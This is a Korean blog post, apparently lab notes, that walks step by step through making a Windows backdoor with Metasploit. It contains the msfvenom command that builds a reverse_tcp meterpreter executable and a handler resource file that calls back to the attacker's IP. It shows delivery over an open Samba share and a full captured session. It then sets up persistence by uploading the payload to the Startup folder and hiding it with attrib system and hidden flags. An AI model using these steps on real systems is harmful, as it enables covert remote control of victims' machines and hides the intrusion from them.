- 사용시스템
KaliLinux
window 7
- 리소스(Resource) 파일로 시스템 침투 환경 만들기
Attacker : Kali 공인 IP Program(listen)
Victim : Window 사설 IP 악성프로그램(execute)
- 백도어 만들기
(kali)
# mkdir -p /root/bin
# cd /root/bin
# vi reverse_resource.rc
|
use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.27.50 set ExitSession false exploit -j -z |
|
> 백그라운드로 실행한다.
- 페이로드(Payload)를 사용하여 공격 코드 자동 생성
[참고] msfvenom CMD
# msfvenom
|
-v, --var-name <name> Specify a custom variable name to use for certain output formats -p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads --payload-options List the payload's standard options -l, --list [type] List a module type. Options are: payloads, encoders, nops, all -f, --format <format> Output format (use --help-formats for a list) --help-formats List available formats -o, --out <path> Save the payload |
|
# msfvenom -l ( # msfvenom -l | grep windows/x64/meterpreter )
|
windows/x64/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection (Windows x64) windows/x64/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection with UUID Support (Windows x64) windows/x64/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection (Windows x64) windows/x64/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection with UUID Support (Windows x64) windows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet) windows/x64/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet) windows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64) windows/x64/meterpreter/reverse_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64) windows/x64/meterpreter/reverse_winhttp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 winhttp) windows/x64/meterpreter/reverse_winhttps Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTPS (Windows x64 winhttp) windows/x64/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell windows/x64/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell windows/x64/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell windows/x64/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell windows/x64/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell |
|
# msfvenom -p windows/x64/meterpreter/reverse_tcp --payload-options
|
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port |
|
# msfvenom --help-formats
|
Executable formats asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war Transform formats bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript |
|
# msfvenom -p windosw/x64/meterpreter/reverse_tcp LHOST=192.168.27.50 -f exe > a.exe
> 이런 옵션들을 사용하여 a라는 실행파일을 만듬
# msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.27.50 LPORT=4444 -f exe -o reverse_test.exe
|
No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: reverse_test.exe |
|
# ls reverse*
|
reverse_resource.rc reverse_test.exe |
|
# file reverse*
|
reverse_resource.rc: ASCII text reverse_test.exe: PE32+ executable (GUI) x86-64, for MS Windows |
|
> .exe 파일은 PE32의 윈도우 실행 파일이다.
> 이 파일을 window 7 에서 실행하면 listen 되어있는 kali에 연결된다.
-> 파일 window 7에 옮기기
[참고] 공유 폴더 만들기
(kali)
# mkdir -p /share
# chmod 777 /share
# vi /etc/samba/smb.conf
|
.....중략..... [share] comment = Kali Linux Shared Directory path = /share browseable = yes read only = no writable = yes public = yes |
|
> 맨아래에 추가
# servive smbd restart
# smbclient -L localhost -N
|
WARNING: The "syslog" option is deprecated Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.8-Debian] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share Disk Kali Linux Shared Directory IPC$ IPC IPC Service (Samba 4.5.8-Debian) Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.8-Debian] Server Comment --------- ------- Workgroup Master --------- ------- |
|
# cp reverse_test.exe /share
- Kali는 listen 상태로 대기
# msfconsole -r reverse_resource.rc
|
______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V4 | |______________________________________________________________________________| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / \ / \ / \ ########### / \ / \ / \ #### ################################################################################ ################################################################################ # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ http://metasploit.com Save 45% of your time on large engagements with Metasploit Pro Learn more on http://rapid7.com/metasploit =[ metasploit v4.14.10-dev ] + -- --=[ 1639 exploits - 944 auxiliary - 289 post ] + -- --=[ 472 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing reverse_resource.rc for ERB directives. resource (reverse_resource.rc)> use exploit/multi/handler resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp resource (reverse_resource.rc)> set LHOST 192.168.27.50 LHOST => 192.168.27.50 resource (reverse_resource.rc)> set ExitSession false ExitSession => false resource (reverse_resource.rc)> exploit -j -z [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.27.50:4444 msf exploit(handler) > [*] Starting the payload handler... msf exploit(handler) > msf exploit(handler) > sessions Active sessions =============== No active sessions. msf exploit(handler) > jobs Jobs ==== Id Name Payload Payload opts -- ---- ------- ------------ 0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.27.50:4444 |
|
> 아직 연결된 세션은 없고 백그라운드로 돌아가는 것은 하나 있다.
(win7)
\\192.168.27.50\share
공유 폴더로 들어가 resource_test.exe 파일을 바탕화면에 옮겨 실행한다.
(kali)
|
msf exploit(handler) > [*] Sending stage (1189423 bytes) to 192.168.27.202 [*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.202:49165) at 2017-11-10 19:35:28 +0900 msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x64/windows adminstrator-PC\adminstrator @ ADMINSTRATOR-PC 192.168.27.50:4444 -> 192.168.27.202:49165 (192.168.27.202) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ls Listing: C:\Users\adminstrator\Desktop ====================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 282 fil 2017-10-10 18:08:24 +0900 desktop.ini 100777/rwxrwxrwx 7168 fil 2017-11-10 19:29:45 +0900 reverse_test.exe meterpreter > sysinfo Computer : ADMINSTRATOR-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : ko_KR Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > cd .. meterpreter > pwd C:\Users\adminstrator meterpreter > cd AppData/Roaming/Microsoft/Windows/"Start Menu"/Programs meterpreter > pwd C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs meterpreter > cd Startup meterpreter > pwd C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup meterpreter > upload reverse_test.exe [*] uploading : reverse_test.exe -> reverse_test.exe [*] uploaded : reverse_test.exe -> reverse_test.exe meterpreter > reboot Rebooting... meterpreter > [*] 192.168.27.202 - Meterpreter session 1 closed. Reason: Died <enter> msf exploit(handler) > quit |
|
> 연결이 된 것을 확인 할 수 있다.
> sessions -i 1 을 통해 세션을 선택하여 열어 여러가지를 할 수 있다.
> C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 에 넣어
윈도우가 시작되고 로그인을 하면 실행된다.
# msfconsole -r reverse_resourece.rc
> 다시 listen 하고 있다가 아까 reboot 시켰던 win7을 로그인하니 다시 연결되었다.
|
msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x64/windows adminstrator-PC\adminstrator @ ADMINSTRATOR-PC 192.168.27.50:4444 -> 192.168.27.202:49162 (192.168.27.202) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > meterpreter > shell Process 1184 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp" cd "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp" C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir dir C �����̺��� �������� �̸��� �����ϴ�. ���� �Ϸ� ��ȣ: 002C-5F51 C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup ������ 2017-11-10 ���� 07:38 <DIR> . 2017-11-10 ���� 07:38 <DIR> .. 2017-11-10 ���� 07:38 7,168 reverse_test.exe 1�� ���� 7,168 ����Ʈ 2�� ������ 52,776,763,392 ����Ʈ ���� C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>chcp chcp Ȱ�� �ڵ� ������: 949 C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>chcp 437 chcp 437 Active code page: 437 C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir dir Volume in drive C has no label. Volume Serial Number is 002C-5F51 Directory of C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 2017-11-10 ?? 07:38 <DIR> . 2017-11-10 ?? 07:38 <DIR> .. 2017-11-10 ?? 07:38 7,168 reverse_test.exe 1 File(s) 7,168 bytes 2 Dir(s) 52,776,751,104 bytes free C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>attrib /? attrib /? Displays or changes file attributes. ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [+I | -I] [drive:][path][filename] [/S [/D] [/L]] + Sets an attribute. - Clears an attribute. R Read-only file attribute. A Archive file attribute. S System file attribute. H Hidden file attribute. I Not content indexed file attribute. [drive:][path][filename] Specifies a file or files for attrib to process. /S Processes matching files in the current folder and all subfolders. /D Processes folders as well. /L Work on the attributes of the Symbolic Link versus the target of the Symbolic Link C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>attrib +h +r +s reverse_test.exe attrib +h +r +s reverse_test.exe |
|
> shell 명령어는 meterpreter를 사용하지 않고 접속된 운영체제 명령어를 사용한다.
> 윈도우에서 한글은 chcp 949 영어는 chcp 437
> attrib 명령어 +/- 로 옵션 추가 R은 Read-only S는 시스템 파일 H 는 숨김 파일이다.
> 시스템 파일로 숨겨놓으면 일반 사용자는 파일을 확인할 수 없다.
(win7)
시작 > shell:startup 이라고 치면 바로 들어가집니다 .
> 파일이 안보임.
[참고]
<WINDOWS + R > > shell:startup 현재 사용자를 위한 시작 프로그램
-> 이곳에 있는 것은 각 사용자가 로그인할때 사용자에 맞춰서 실행됨
<WINDOWS + R > > shell:common startup 모든 사용자를 위한 시작 프로그램
-> 이곳에 있는 것은 어떤 사용자가 로그인 하든 모두 실행됨
(kali )
|
C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>attrib -h -r -s reverse_test.exe attrib -h -r -s reverse_test.exe |
|
(win7)
> 나타남
>> 이런식으로 로그인시 실행되는 폴더안에 넣어두고 attrib 옵션을 주면 일반 사용자는 알 수가 없다.
정리)
Attacker ----------------> Victim
msfconsole shell/bind_tcp
Attacker <---------------- Victim
msfconsole(listen) meterpreter/reverse_tcp
'Security > 정보 수집' 카테고리의 다른 글
| Backdoor Factory를 사용한 악성코드 제작 (0) | 2017.11.11 |
|---|---|
| 메타스플로잇을 이용하여 윈도우 2008 로그 삭제하기 (0) | 2017.11.10 |
| 메타스플로잇을 이용하여 톰캣(Tomcat) 취약점 공격 (0) | 2017.11.10 |
| 메타스플로잇을 사용하여 사전 파일을 이용한 MySQL 원격 로그인 시도 (0) | 2017.11.09 |
| zenmap을 통해 포트스캔된 정보를 metasploit에서 읽어 들이기 (0) | 2017.11.09 |
